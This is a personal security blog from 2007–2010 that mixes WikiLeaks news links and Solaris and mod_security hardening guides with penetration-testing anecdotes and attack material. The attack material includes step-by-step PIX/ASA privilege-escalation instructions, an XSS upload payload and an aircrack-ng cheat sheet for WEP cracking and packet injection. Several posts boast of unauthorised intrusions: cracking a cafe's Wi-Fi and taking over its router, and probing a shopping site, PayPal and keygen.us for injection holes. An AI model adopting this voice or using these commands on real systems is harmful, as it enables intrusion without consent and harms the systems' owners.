Taking Network Security to the Streets

More WikiLeaks News

2010-12-15T22:37:00.000+08:00

Pro WikiLeaks hacker group’s DDoS tool downloads top 40,000 (12/13/10)
Imperva, the web security specialist, has reported that the tool released by the Anonymous Hacker Group for would-be WikiLeaks protesters has been downloaded over 40 000 times, with the majority of downloads occurring in the US. Imperva said there were three versions of the denial of service tool that members have been able to use:
http://www.infosecurity-magazine.com/view/14611/pro-wikileaks-hacker-groups-ddos-tool-downloads-top-40000/

Anonymous attacks more websites, as second Dutch teenager is arrested in WikiLeaks saga (12/13/10)
http://www.infosecurity-us.com/view/14621/anonymous-attacks-more-websites-as-second-dutch-teenager-is-arrested-in-wikileaks-saga/

WikiLeaks Imbroglio Renews Focus on Risk Management (12/13/10)
http://www.information-management.com/news/risk_management_data_storage_security_WikiLeaks-10019275-1.html

WikiLeaks-Related Spam Spotted (12/13/10)
http://blog.trendmicro.com/wikileaks-related-spam-spotted/

UK.gov braces for possible Wikileaks hacklash (12/14/10)
http://www.theregister.co.uk/2010/12/14/wikileaks_hacklash/

The Hacka Man

WikiLeaks

2010-12-14T22:37:00.002+08:00

So Wikileaks recently made the news headlines on all major media. Companies with dirty secrets needs to be on extra vigilant and watch out for attacks. The next attack target, BAC??? Are controls and processes in place?? What mitigation techniques are effective? Let's monitor and watch for now. :)

Attacking BAC

The Hacka Man

XSS without Browser

2010-11-03T00:13:00.002+08:00

To all Sec guys, I had been cracking my brain over these past 2 weeks thinking on how do i verify successful XSS attacks without using the browser. I know it sound absurd, but that's the way it is. All i have is pcap files available. From those pcap files, we can obviously search for those "script" word or other variants of XSS attacks by using regular expression. However, how do we know if an attempt is successfully executed or just false positive. Looking at the HTTP 200 response code, that will tell me that the attempt went through, but how do we know if we are truly exploited. Javascript maybe?

The Hacka Man

Better Risk Management for Banking Industry

2008-08-18T10:40:00.004+08:00

With the recent identify theft cases that are happening around the banking industry, a new regulation is going to be implemented for counter fight identity theft. Effective November 1, 2008, all federally regulated banks, credit card companies and other financial institutions will be required to be in full compliance with the Identity Theft Red Flags Rule, which is designed to financial services firms protect consumers' identities.. The goal of the rules is to "flag" attempted and actual identity theft early, thereby reducing consequences associated with identity theft.

Each institution's program must include policies and procedures for detecting, preventing and mitigating identity theft. Further, the program must set forth a list of red flag activities that signal possible identity theft and a response plan for when a flag is raised. In addition, each financial institution must update its program periodically to reflect changes in risks from identity theft and implement a risk management program as part of the ID Theft Red Flags regulation.

8 tips for a Better Risk Management:

1. Assess in detail the different products and service offering of a financial institution, and review which red flags and level of risk is applicable for that particular product or service offer for example, - "credit cards" need high level of monitoring as well as pose high risk as fraudulent activities are most likely.

2. Streamline automation and manual checks for red flag items where necessary.

3. Focus on the different channels through which these products and services are provided to end users. For example, online access over the internet is more risky when compared to physically going to the bank.

4. Spend different amount of attention on each product and service offering based on risk factor. High risk demands more attention.

5. Study the historical data of an institution for identifying fraud activities, patterns etc.

6. Integrate risk management to current security and privacy programs by adopting similar approach for conducting risk assessments for different departments within the enterprise and leveraging data from these individual risk assessments to another. This will help identify clearly which regulation has directly focused on the risk or red flag action item, without duplicating effort, then attacking and placing checks on the ones that are relevant.

7. Do not depend totally on the vendor or service bureau for putting checks and conducting their own risk assessment. Instead have a thorough risk assessment program initiated and implemented by the financial institution for its different service bureaus to ensure full proof check and updates.

8. Appoint a key person to take charge and ownership of the risk management process. This person will initiate annual risk program effectiveness, adopt a revision process, monitor and constantly analyze current industry situations and risk profile, appoint a committee for ensuring that appropriate program is deployed, making and proposing changes etc.
Upasana
The Hacka Man

How to hack a Bank part 1?

2008-08-18T08:06:00.009+08:00

This is going to be a very sensitive topic for the Banking industry, however I am not going to post any exploits or vulnerabilities of how to hack a bank, instead a high level overview of how to gain money from a bank. I am not going to write a long article on this as the story might go on and on.

Several months back, i was performing a penetration test for a large bank here. Although it was only a web penetration test, i was already starting to observe the banking environment, the technology used, the physical environment, their partners, ATM etc, to see if loopholes can discovered. Everyday at the bank, i made new friends and started talking to them to learn more about the banking environment and the job nature. At the end of the penetration test, I was thinking to publish an article of how to hack a bank, however, its either i am too lazy to do so or i can't be bothered. Today, I just feel like writing an article on it, just a sudden urge to do so.

In early days, the banking environment used to be a simple and closed environment whereby the only way to hack the bank is to rob the bank. There were no ATMs, no internet banking, no huge and complicated networks. To withdraw any money, the only way is to go to the bank's branch and fill up the withdraw form and provide your bank account passbook for updating purposes and the money is given to you. Mainframe is the backend system that does all the processing of the transactions, i think until this very day, it still prevails. Today, we are more advanced. We have internet banking without the need of any passbooks, we have ATMs, Credit and Debit cards, complex networks to interconnect multiple systems together, we have cash deposit machines, huge variations of databases and partners that might house the bank's data/information. So you see, it used to be maybe one or two doors opened. Today however, many possibilities are possible because of multiple doors being opened. We still have not factored in the physical site and environment. You might be surprise that this is one of the most easiest way to enter the bank.

A lot of people might think that hacking the bank is a tough job due to its tight security and controls, but you might be surprise that sometimes the weakest link is actually the easiest link. Stay tuned for part 2.

Disclaimer: The materials and information here are solely for educational purpose only. Do not attempt to hack a bank with knowledge acquired. Do not try at any bank.

The Hacka Man

Yet Another SQL injection

2008-05-12T16:28:00.003+08:00

I was boring the other day, so here i am again toying and playing with SQL injection. Wow, for this particular site, not only they did not turn off debugging, they also allow me to view other very juicy information. I must say if i am determined to hack the site, i can successful grab lotsa juicy information. Not only that, because it is a online shopping site, i can change information and buy things at a much much cheaper price. Check out the information leakage!!

The Hacka Man

Scanless PCI, Hurray

2008-04-03T14:41:00.002+08:00

Sometime ago, i mentioned something about PCI and its credibility. In short i was saying that are all those PCI certified companies safe from attacks just because they are PCI certified? Today we witnessed something better, more cost effective, faster, least intrusive and for the best part? It does not even cost a single cent as compared to hackersafe or qualys, unless you subscribe for additinal service. Well, i had not personally register for the service, but i guess it will be much more proficient with the current pci standards. The setup up is simple, just copy and paste the codes to your side and that will do it. Check out

http://www.scanlesspci.com/

The Hacka Man

PIX/ASA Finesse 7.1 & 7.2 Privilege Escalation

2008-01-30T15:10:00.000+08:00

I was trying to get into admin mode without the enable password during a penetration test and i came across a post by Terry where he describes a designing flaw in the PIX/ASA Finesse Operation System, version 7.1 and 7.2. Well, it was possible to escalate a normal level 0 user to a level 15 privilege user. The exploit is simple and it only works locally, at the console and remotely with Telnet. However, do note that it will NOT work if SSH, TACACS or Radius is implemented in the firewall. Below are the steps.

1. Login with your user level 0 account. Once logon, you will be prompted to enter the enable password which is the privilege password.

2. At this prompt if you move your cursor forward with a space or character(it doesn't matter if there are more then one), and then proceed to delete any spaces or characters, by holding down the backspace a second after deleting the last character it should immediately drop you into level 15 privilege-exec mode.

It had been tested on PIX 515E, Finesse version 7.2 and i had also tested it on the PIX 525.

The Hacka Man

Web Attacker Toolkit

2008-01-16T14:03:00.000+08:00

Sorry for the lack of updates. Been roaming around for the past 2 months and felt a little lazy in updating my blog. i was reading news on the internet today and i read something about a hacking toolkit that was able to compromise thousands of webservers and that caught my attention. Well, apparently the tool called the "Web Attacker Toolkit" can be bought from the Russian hacking group called Inex-Lux for a cheap price. All unpatched IE and Firefox browsers can be compromised, with a trojan silently being installed into the local PC without user knowing it. Once a trojan is installed, the game is over. After reading the news, of course i have upgraded my IE and my Firefox to the latest version to avoid any exploitation. Check out those three links below:

http://www.informationweek.com/news/showArticle.jhtml?articleID=186700539

http://www.websense.com/securitylabs/alerts/alert.php?AlertID=472

http://informationweek.com/news/showArticle.jhtml?articleID=205603044

The Hacka Man

.NET ViewState vulnerable to manipulation exploits

2007-12-02T18:31:00.000+08:00

This past week i had a chance to audit a customer who is using microsoft's viewstate. So what is ViewState and why is it vulnerable? Well, ViewState is an ASP.NET feature that allows you to persist form properties when a page posts back to itself. ASP.NET takes the current state of all form controls and stores them as an encoded string in a hidden form field. The risk of View State is that an attacker might be able to view or modify these form values to accomplish a variety of attacks. So, the question is how do you modify and view the values in ViewState? To do so, you can download PortSwigger's latest burp proxy to accomplish the task of neccessary manipulation. View State appears in the HTML source as a hidden form field and it is using base64 encoding.

The latest version of burp proxy allows you to decode ViewState's base64 algorithm and view the clear contents inside, or you can also download ViewState decoder from Fritz Onion to ONLY view the contents inside. Check out the both links below:

http://www.dotnetspider.com/tools/ShowTool.aspx?ToolId=378
http://blog.portswigger.net/2007/06/viewstate-snooping.html

Because the customer is using some sort of VPN, i was unable to use PortSwigger's burp proxy for what ever reason. However, i managed to decode the ViewState using Viewstate Decoder.

To prevent attackers from manipulating View State, you can include a message authentication code (MAC). A MAC is essentially a hash of the data that ensures its integrity. You can enable the View State MAC on the machine, application, or page level. You can enable the MAC wherever you enable View State with this attribute:
enableViewStateMac="true"

To truly make sure ViewState is secured, you will need to encrypt the data with ViewStateEncryptionMode property set to true. This will prevent attackers from decoding and viewing data inside viewstate. To read more about ViewState security, check out the msdn link below:

http://msdn2.microsoft.com/en-us/library/ms178199.aspx
http://msdn.microsoft.com/msdnmag/issues/03/02/CuttingEdge/

The Hacka Man

Old School Oracle Auditing

2007-11-25T19:31:00.000+08:00

I was again reading for hacking articles and one of the article "Simple Oracle Auditing" caught my attention. Well, its an old article but its still fun to read and learn from the gurus. Check it out guys: http://www.securityfocus.com/infocus/1689

The Hacka Man

7 steps to better Solaris Network Settings

2007-11-22T07:59:00.000+08:00

I was auditing one of our customer again and this time round, i managed to come up with a 7 step guide to better secure the TCP stack for Solaris. Well, you guys can add on for more.

1. Configure for more random TCP sequence number generation. Check that in(/etc/default/inetinit), the TCP_STRONG_ISS is set to 2. For instance, TCP_STRONG_ISS=2

2. IP forwarding is to be turned off to prevent the machine acting as a router. To disable IP forwarding, a file "/etc/notrouter" need to be present. If the file is missing, issue the following command to create one : touch /etc/notrouter

To prevent dynamic routes updates via the network, move "in.routed" and "in.rdisc" away from "/usr/sbin" directory by perform the following commands :
mv /usr/sbin/in.routed /export/home/cfgh/base
mv /usr/sbin/in.rdisc /export/home/cfgh/base

3. Change default kernel IP settings for better security. Following the following steps to change the kernel IP defaults values :

Setup files and environment:
touch /etc/init.d/exconfig
ln -s /etc/init.d/exconfig /etc/rc2.d/S70exconfig
chmod 744 /etc/init.d/exconfig /etc/rc2.d/S70exconfig

Edit file "/etc/init.d/exconfig" and add the following lines:
#!/bin/sh
# /etc/init.d/exconfig
RELEASE=`/usr/bin/uname -r`
release7 ()
{
/usr/sbin/ex -set /dev/ip ip_forwarding 0
/usr/sbin/ex -set /dev/ip ip_strict_dst_multihoming 1
/usr/sbin/ex -set /dev/ip ip_send_redirects 0
/usr/sbin/ex -set /dev/ip ip_ignore_redirect 1
/usr/sbin/ex -set /dev/ip ip_forward_src_routed 0
/usr/sbin/ex -set /dev/ip ip_forward_directed_broadcasts 0
/usr/sbin/ex -set /dev/ip ip_respond_to_echo_broadcast 0
/usr/sbin/ex -set /dev/tcp tcp_conn_req_max_q0 4096
/usr/sbin/ex -set /dev/tcp tcp_ip_abort_cinterval 60000
/usr/sbin/ex -set /dev/ip ip_respond_to_timestamp 0
/usr/sbin/ex -set /dev/ip ip_respond_to_timestamp_broadcast 0
/usr/sbin/ex -set /dev/ip ip_respond_to_address_mask_broadcast 0
/usr/sbin/ex -set /dev/arp arp_cleanup_interval 60000
id -a mqm > /dev/null 2>&1
if [ \$? -eq 0 ]
then
/usr/sbin/ex -set /dev/tcp tcp_keepalive_interval 600000
fi
}
release8 ()
{
/usr/sbin/ex -set /dev/ip ip6_forwarding 0
/usr/sbin/ex -set /dev/ip ip6_strict_dst_multihoming 1
/usr/sbin/ex -set /dev/ip ip6_send_redirects 0
/usr/sbin/ex -set /dev/ip ip6_ignore_redirect 1
/usr/sbin/ex -set /dev/ip ip6_forward_src_routed 0
/usr/sbin/ex -set /dev/ip ip_ire_arp_interval 60000
}
release6 ()
{
/usr/sbin/ex -set /dev/ip ip_respond_to_echo_broadcast 0
/usr/sbin/ex -set /dev/ip ip_forward_directed_broadcasts 0
/usr/sbin/ex -set /dev/ip ip_strict_dst_multihoming 1
/usr/sbin/ex -set /dev/ip ip_ignore_redirect 1
/usr/sbin/ex -set /dev/ip ip_forward_src_routed 0
}

if [ \$RELEASE = "5.7" ]
then
release7
elif [ \$RELEASE = "5.8" ] || [ \$RELEASE = "5.10" ] || [ \$RELEASE = "5.9" ]
then
release7
release8
elif [ \$RELEASE = "5.6" ]
then
release6
fi

4. Disable multicast from the server, edit the file "/etc/rc2.d/S72inetsvc" and comment out/remove the following lines :
#(
#if [ "$_INIT_NET_STRATEGY" = "dhcp" ]; then
# mcastif=`/sbin/dhcpinfo Yiaddr` || mcastif=$_INIT_UTS_NODENAME
#else
# mcastif=$_INIT_UTS_NODENAME
#fi
#
#echo "Setting default Ipv4 interface for multicase:" \
# "add net 224.0/4: gateway $mcastif
#
#/usr/sbin/route -n add -interface "224.0/4" "$mcastif" >/dev/null
#)&

For Solaris 10
Multicast would be disabled using /etc/rc2.d/S72inetsvc-os10

5. Denial of Service Prevention System Settings.
Services that must be disabled on all servers, unless required by business function from /etc/services. Services include: ftp-data ftp tftp pop2 pop3 pop-2 nntp chargen daytime discard echo finger talk who whois new-rwho klogin eklogin telnet systat netstat time

6. Prevent "core dump" generated by inetd as it may contain login information. This could be achieved by editing the file "/etc/rc2.d/S72inetsvc". Change the line :
/usr/sbin/inetd -s &
to /usr/bin/ulimit -c 0; /usr/sbin/inetd -s -t &
Note :
ulimit -c 0 : set the core file size to 0 byte
inetd -s -t : stand-alone server with tracing of all tcp connections

For Solaris 10
Create the script /etc/rc2.d/S72inetsvc-os10 as per below.
#cat /etc/rc2.d/S72inetsvc-os10
IPADDR=`netstat -nr | grep -w 224.0.0.0 | awk '{print $2}'`
/usr/sbin/route -n delete -interface "224.0/4" $IPADDR
/usr/sbin/svcadm enable inetd
/usr/sbin/inetadm -M tcp_trace=TRUE
#chmod 555 /etc/rc2.d/S72inetsvc-os10

7. .netrc files System Settings (.netrc files, .netrc files in root’s home directory). Files are not permitted, remove the files if any, issue command find / -name .netrc -print

The Hacka Man

Hacking Iphone the fun way

2007-11-21T08:49:00.000+08:00

I got my iphone and i know there are exploits and vulnerabilities in it discovered by H.D Moore, creator of metasploit. However i wasn't too enthusiastic about the damage that this exploit can do but more into the fun aspect aspect of how to install new 3rd party application in phone. I know that you can install hacking tools too, but thats not my goal. Why install those tools when you can install it in the PC? Anyway, I managed to unlock the phone with a few help and of course start using it. It is the coolest phone out on the planet and of course with the video below, i managed to install more applications in my phone. Check it out.

The Hacka Man

Hacking SCADA

2007-11-20T09:44:00.000+08:00

While i was in Dubai, i got a chance to visit one of our customers who was using SCADA. Back then, it was so new to me and i have no idea of how to actually audit it. Back here in Singapore, i got another chance to actually test and audit SCADA systems and this time round, i found a way to actually break the application and network apart. However, i have to be very careful during the audit, as one wrong move may affect the whole of Singapore.

So what is SCADA? SCADA stands for Supervisory Control and Data Acquisition and they are the systems that deliver water, power supply, gas and some other items to your home. Check out http://en.wikipedia.org/wiki/SCADA if you would love to read more about it. There had been incidents where SCADA systems had been hacked and information was stolen by terrorist. Also, internet worms like the Slammer worm also affected the systems and cause a total DoS. Why is all these happening? All i can say is either because those systems are exposed to the internet or they are using proprietary protocols and they think that they are safe from hackers and doesnt care about it. Those people working in SCADA are so wrong, they doesnt bother about security at all, and i guess its because something disturbing might have happen and only then they start to panic and need people like us to audit their systems.

SCADA uses their own proprietary protocols like DNP3, OPC, Modbus, DCS, etc, and its possible to use Wireshark to actually monitor the traffic and see how the handshaking process work. By observing the handshake, i realised that it was possible to perform man in the middle attacks, but of course would require developing of some tools to perform the job. Some other attacks that are possible include DoS, capturing of username and password, injecting worms and virus and many other old school techniques.

The problems with SCADA:
1. Windows & Linux Vulnerabilities
2. Not patched regularly – maximum uptime needed
3. Denial of Service Attack
4. Continuous string of reboot command
5. No Authentication
6. No Accounting
7. Traffic sent in clear text (username & password)
8. No encryption

To Pentest on SCADA systems, you can do the following:
1. Port Scanning
2. OS Fingerprinting
3. Vulnerability Scanning
4. Exploitation
5. Credentials Guessing
6. Sniffing
7. Fuzzing

Of course there are many other possibilities for pentesting SCADA systems. I for sure want another session with SCADA because it is so fun having to touch on mission critical systems that can affect the whole country. There are tons and tons of possibilities and problems with SCADA and i have just outline a few obvious ones. Of course, you got to be in the SCADA environment if you actually want to discover more possibilities, but then again, do we have such chances everyday?

The Hacka Man

Two factor authentication bypassed

2007-11-19T09:24:00.000+08:00

It had been a long fortnight and i have not finished writing my report for various banks. It was really that much report to write and especially for one specific particular bank. I managed to bypass the security control mechanism setup by this bank and steal the username and password of any user.

Most of the banks here in Singapore practised two factor authentication and for most people, they think that it is secure because of the extra added security. However, a PoC was released to the bank depicting to them that it was possible to bypass the security control mechanism and it was possible to capture the username and password of any user. I am sorry guys, i am not supposed to leak out any information here. It is very sensitive from the bank's point of view. The best part of the exploit was there was no XSS or sql injection or any sorts of vulnerability that facilitate this exploit. It was purely just information gathered during the passive information gathering exercise.

I was browsing their site and i discovered a section where some information could help me facilitate the research of writing the exploit. I had an albeit pedantic thought when i saw that particular section. I was thinking that with all that information, i am definitely able to bypass the security mechanism. However to do that, i would require someone else to write the code for me with my ideas. Nevertheless, within a week, i managed to come out with a PoC and display a great deal of demostration. Guys, i know you want to know the details, but i simply can't reveal anything because of the Non Disclosure Agreement I signed. All i can say is passive information gathering is a very important exercise when trying to attack huge organizaton and guys can spend hours and days writing a cool exploit, with me, all i need is total observation and i got the results i want with ease. Why bother to go all the way to do something difficult when something easy can be accomplished faster??

I would love to attach a screenshot of what i managed to captured, but then again, it is too sensitive. I am sorry, but just know that it is possible to bypass 2FA.

The Hacka Man

Image upload xss

2007-11-17T21:34:00.000+08:00

Also, i stumble across an old blog post by rsnake where it was possible to execute XSS on an upload function.

http://ha.ckers.org/blog/20070603/image-upload-xss/

http://pstgroup.blogspot.com/2007/06/tipsimage-upload-xss.html

an example of something you might test for:

So you upload this file:

http://ha.ckers.org/image-xss/"onerror="alert('XSS')"a=".jpg

This ends up making the page look like:

The Hacka Man

DOM Based XSS

2007-11-17T21:23:00.000+08:00

I was reading Amit Klein's 2005 article on DOM Based XSS and he actually mentioned a few things to look out for in DOM XSS. In that article, he gave us an insight look of how to look for potential XSS in the DOM and why sanitizing is important on the client side.

The full article is here: http://www.webappsec.org/projects/articles/071105.html

Below is a snippet:

2. Analyzing and hardening the client side (Javascript) code. Reference to DOM objects that may be influenced by the user (attacker) should be inspected, including (but not limited to):

document.URL
document.URLUnencoded
document.location (and many of its properties)
document.referrer
window.location (and many of its properties)
Note that a document object property or a window object property may be referenced syntactically in many ways - explicitly (e.g. window.location), implicitly (e.g. location), or via obtaining a handle to a window and using it (e.g. handle_to_some_window.location).

Special attention should be given to scenarios wherein the DOM is modified, either explicitly or potentially, either via raw access to the HTML or via access to the DOM itself, e.g. (by no means an exhaustive list, there are probably various browser extensions):

Write raw HTML, e.g.:
document.write(…)
document.writeln(…)
document.body.innerHtml=…
Directly modifying the DOM (including DHTML events), e.g.:
document.forms[0].action=… (and various other collections)
document.attachEvent(…)
document.create…(…)
document.execCommand(…)
document.body. … (accessing the DOM through the body object)
window.attachEvent(…)
Replacing the document URL, e.g.:
document.location=… (and assigning to location’s href, host and hostname)
document.location.hostname=…
document.location.replace(…)
document.location.assign(…)
document.URL=…
window.navigate(…)
Opening/modifying a window, e.g.:
document.open(…)
window.open(…)
window.location.href=… (and assigning to location’s href, host and hostname)
Directly executing script, e.g.:
eval(…)
window.execScript(…)
window.setInterval(…)
window.setTimeout(…)

The Hacka Man

Deadly execution in huge Financial Company

2007-11-16T08:33:00.001+08:00

I was auditing one of the biggest financial company in the world and here in the Singapore branch, it was just really bad. I was playing around with the software and noticed an uploading function. With evil thoughts in my mind, i quickly wanted to see if this application does allow uploading of exe, bat or some other executable files. To my wildest surprise, it does allow the uploading of exe files and i tell you, i could upload any sorts of trojan or virus and execute it on the client's pc. I actually did upload an exe program and tried execute it on the client's pc and it did execute the program accordingly and smoothly with no protection on the client's pc. It was really just bad. Moreover, the application itself also does allow command execution on the querystring which was really an eye opener. It was just a lucky day with my audit and an unlucky day for the customer. Report had been submitted and lets hope they will rectify the problem to avoid any attacks.

Check out for my next post on Two Factor Authentication Man in the Middle attack PoC

The Hacka Man

Basics of Mod_Security

2007-11-15T09:15:00.000+08:00

This past week, i was auditing a customer's web server defence against web attacks and i realised that he did not install mod_security as one of their modules in the server. Well, considering it is a huge customer, they should at least do some basic filtering using mod_security since their servers are running on linux. I had mentioned about mod_security in my previous post and for those who are still not sure what it is, mod_security is a web application firewall that is an Apache Web Server add-on module that provides intrusion detection, content filtering, and web-based attack protection. It is good at detecting and stopping many known web attacks, such as many SQL injection type attacks, cross-site scripting, directory traversal type attacks, and many others. Below is a snippet of a simple basic mod_security configuration:

# Turn the filtering engine On or Off
SecFilterEngine On

# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On

# Unicode encoding check
SecFilterCheckUnicodeEncoding On

# Only allow bytes from this range
SecFilterForceByteRange 0 255

# Only log actionable requests
SecAuditEngine RelevantOnly

# The name of the audit log file
SecAuditLog /var/log/apache2/audit_log

# Debug level set to a minimum
SecFilterDebugLog /var/log/apache2/modsec_debug_log
SecFilterDebugLevel 2

# Should mod_security inspect POST payloads
SecFilterScanPOST On

# By default log and deny suspicious requests
# with HTTP status 500
SecFilterDefaultAction "deny,log,status:500"

# Add custom secfilter rules here

Of course, you can add on more items and it depends on what you need it to filter and protect. Mod_Security does come with a performance cost, however, the security benefits far outweight the performance cost. Do consider using it.

The Hacka Man

No hacking activites

2007-11-15T00:39:00.000+08:00

Been really busy with all the results i got from my projects and pretty occupied with report writing. I am handling a few projects currently and well, there ain't anytime for me to research or perform any sorta testing or hacking. This is good in the sense that it keeps me busy and at least i feel "useful" to my company in the sense that i am performing audits for our customers during this peak period. I will definitely resume back to the hacking mode soon and check out for more cool ill street hacking. As of blogging now, i am still writing long unfinished reports. Reports are piling up if i don't start doing it. Till then, stay tuned for my next installment.

The Hacka Man

SAP hacking Oracle?????

2007-11-05T22:21:00.000+08:00

This is one of the biggest news i had ever heard of, SAP hacking ORACLE. That is totally shocking but at the same time funny. Big organizations are fighting and competiting for each other to secure their position in the software market. I am for once happy that SAP got into trouble. Well, the news are spreading like fire over the internet. Check out 2 of the sites below, and of course you can google for more.

http://www.theinquirer.net/en/inquirer/news/2007/07/03/red-faced-sap-admits-hacking-oracle

http://blogs.zdnet.com/threatchaos/?p=450

The Hacka Man

keygen.us XSS

2007-11-02T20:27:00.000+08:00

I was again playing around with XSS and this time on one of the biggest cracking site which is keygen.us. Well, i tried some basic XSS and it didn't work as they did some input validation and escape my input characters. It got me pumped up and wanted an XSS on their site. In the end, with a few help i managed to get an XSS on their site and one of them includes mario's exploit. It was an overall learning experience for me and an exiciting one. Check it out:

The Hacka Man

Paypal CRMgateway XSS

2007-11-01T14:09:00.000+08:00

Paypal used to suffer from a lot from phishing attacks in the past and i bet even today, the bad guys are finding ways to exploit this hole to get more money. I was again playing around and i managed to find a XSS hole in paypal's crmgateway. Well, it seems like paypal never learn their lesson in the past and still allows for injections. Anyway, i had already cancelled my account with paypal because of their bad service and unforgivable mistake they made. Good luck paypal.

The Hacka Man

Hacking and Cracking Wireless

2007-11-01T01:08:00.000+08:00

One day after intruding into the router, i remembered my colleague Mark compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and managed to capture the commands needed when doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands and it comes in very handy when doing a wireless audit and save you the time needed to read manuals. Use it in your next wireless audit. Thank you Mark for the compilation and your effort.

--------------------------------------------------------------------

install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)

Steps:

#####################################################
CONFIGURATION:

D-Link DWL-G122

ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 channel

NetGear WG511T

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

specify channel
iwocnfig ath0 channel n
########################################################

CHANGING MAC ADDRESS

ifconfig ath0 down
ifconfig ath0 hw ether
ifconfig ath0 up

use macchanger instead

#########################################################

INJECTION TESTING

NetGear WG511T
aireplay-ng -9
===================
D-Lnk DWL G122

aireplay-ng -9 (if this doesn't work it means no ap on same channel found)
Try card-to-card injection below:
====================

Card-To-Card Injection:
Make sure they are on same channel using (channel hopping does not work on D-Link DWL G122???)
iwlist channel (to find out the current channel set)

aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================

########################################################

PACKET CAPTURE:

airodump-ng device (find out first the interested bssid and channel)

Then capture packets on that particular channel:

airodump-ng --channel --bssid -w dumpfile device(ath0/rausb0

Notes: capture full packets when using PTW attack (don't dump ivs only)

MERGING capture files (RESUMING)

mergecap -w out.cap test1.cap test2.cap test3.cap

FOR IVS

use ivstools

############################################################

ATTACKS

You may want to associate to ap first using fakeauth before any test
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0 -h 06:14:6c:4c:b9:7c ath0

Automatic Association:
ireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0

ARP replay (for wep cracking PTW method):
if RXQ in airodump window is > 90 then #/s = 200+ (watch for #Data, it contains IV)

aireplay-ng --arpreplay -b -h device

Deauthentication (to capture WPA handshake, reveal hidden SSID)
Fake Authentication (to authenticate to AP in case needed before we can inject)

#############################################################
WEP CRACKING

Using PTW attack (version 0.9+ only) Packets must be ARP (from arp-replay)

aircrack-ng -z -b dumpfile*.cap
40-bit = 20,000
104-bit = 40,000

Normal Attack
-n 64 (test if 40-bin WEP) remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile

#########################################################

RESOLVE MAC Address to IP Address

use netdiscover or ARP tools

##########################################################

Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.

#######################################################

Increasing injection Speed

iwconfig device rate 11M

#####################################################

---------------------------------------------------------------------------

The Hacka Man

Hacked into a Wireless Router.

2007-10-31T15:22:00.000+08:00

These days, i am just mad crazy. Hacking, hacking and still hacking. Basically i am dead boring and decide to see how far can i go with my hacking skills. Today, after finishing auditing a customer, i wanted to check my email as i need to send out an urgent email. I saw an internet cafe with Wifi connection, however there was encryption on. Within a few minutes, i managed to crack their password and hacked straight into their router. With that, i managed to use bit torrent to do port forwarding and download my favourite tv show. Well, it wasn't as thrilling as the first time i hacked into a wireless router, but still, it was a hack. How i do it? Just by observation and some trial and error and there you go.

The Hacka Man

Web Application Security with Joe Walker

2007-10-31T09:52:00.000+08:00

This is a great slideshare from Joe Walker with all the new hacking techniques that involves with ajax and Web2.0. Its content is simple yet very entertaining and easily understandable. Check it out guys,

| View | Upload your own

http://getahead.org/blog/joe/

The Hacka Man

Free Audit, Is it Real??

2007-10-31T08:03:00.000+08:00

Ok, i am providing free audits for those who need my help in assisting them to secure their applications or networks and read properly, i am NOT charging a single cent for my effort of work in helping you. The reason for doing so is because i am giving back to the community that once helped me in getting where i am today. I remembered i was hacking like nobody business back in the days with trojans, port scanning, exploits, etc..I was very young then and indeed very enthusiastic in all sorts of hacking. Today, because of the busy work schedule and commitments i have, i tend to have lesser time in reading or researching. However, i am still pretty much involved in the security community when in comes to networking and web applications. There are actually quite a number of people who approached me for free auditing of their public facing web applications and i actually managed test their site and show them what i had found. Of course, i cannot reveal any of those clients i did before, but trust me, some of them are huge organization and of course some are my friends.

To get a free audit, i need the following details:

1. Prove that you are the owner of the site or network.

2. Personal details of yourself.

3. If you are from a company, use your company's email to send me an email and follow up with a call to my mobile.

4. If you are an individual, i would require you to give me a call to my mobile or skype. Send me an email first at hackathology@gmail.com

5. If there should be any meetup, prepare a Non Diclosure Agreement for signing if required and discuss for the Scope Of Work.

I cannot guarantee i have the time to test and deliver on time for each and every customer if the request traffic is high, however, i will do my best to deliver you of what i promised. Also, if the scope gets larger, then the amount of delay will be longer, it all depends. Don't forget i have a day time job and doing a favour for you. Lastly, should there be any changes based on the audit details, i will update it here on my blog.

The Hacka Man

Detecting BroadVision Applications. Are they secure?

2007-10-30T07:42:00.000+08:00

Are proprietary applications secure? Well, i guess yes and no. Security researchers are constantly researching for flaws in those applications and only if a bug is reported, will only then the company take actions to secure their loopholes. I am currently auditing a BroadVision application and what a surprised i got from my results. I am not supposed to reveal anything, but i let me tell you, for a critical application like this, i am not sure if the customer is using an old version of BroadVision or it was simply not check for sanitization. I could basically do pretty much i want from that application and create a havoc. Too bad, i cant show anything here but trust me, if you guys got a chance to audit a BroadVision application, you will be surprised with the kind of flaws you find. Its basically like opening a can of worms, waiting for someone to feed on it.

Well, at first i wasn't sure it was a BroadVision application, however after some researching on observation on the HTTP headers, this is what i got:

POST http://example.com/bvsn/bvcom/en/server/whereto.jsp?BV_SessionID=NNNN1809204881.10923774158NNNN&BV_EngineID=nnndaoplghjkiihcfklcfkmdgohdgih.0&BV_UseBVCookie=yes HTTP/1.0

The killer signature here is the parameter names of BV_SessionID and BV_ EngineID. If you see these anywhere in a URL or on a http header, you have more or less nailed down a BroadVision Application. Of course there are some other parameters like checking for .do extention, however that wasn't seen during the audit. Google for those highlighted in bold and you will see what i mean. I am now signing off here and back for another round of audit. I am going to pretty much cripple the whole application this time round.

The Hacka Man

Injection Vectors, Are you up for it?

2007-10-29T20:09:00.000+08:00

